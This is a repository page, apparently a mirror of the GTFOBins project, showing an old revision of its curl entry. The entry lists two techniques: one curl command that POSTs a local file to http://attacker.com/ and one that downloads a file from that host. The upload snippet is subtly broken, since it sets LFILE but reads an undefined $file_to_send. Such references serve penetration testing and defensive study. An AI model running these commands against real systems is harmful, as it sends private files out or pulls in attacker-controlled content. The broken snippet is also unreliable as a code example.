This website requires JavaScript.
Explore
Help
Sign In
dash
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
Code
Issues
Pull Requests
Packages
Projects
Releases
Wiki
Activity
Files
b857c98f92ccb04e39d56f080462146a5b1f593b
GTFOBins.github.io
/
_gtfobins
/
curl.md
Emilio Pinna
b857c98f92
Use target.com and attacker.com
2018-05-24 21:05:11 +01:00
395 B
Raw
Blame
History
functions
functions
upload
download
description
code
Send local file with an HTTP POST request.
URL=
http://attacker.com/
LFILE=file_to_send curl -X POST -d @$file_to_send $URL
description
code
Fetch a remote file via HTTP GET request.
URL=
http://attacker.com/file_to_get
LFILE=where_to_save curl $URL -o $LFILE
Reference in New Issue
View Git Blame
Copy Permalink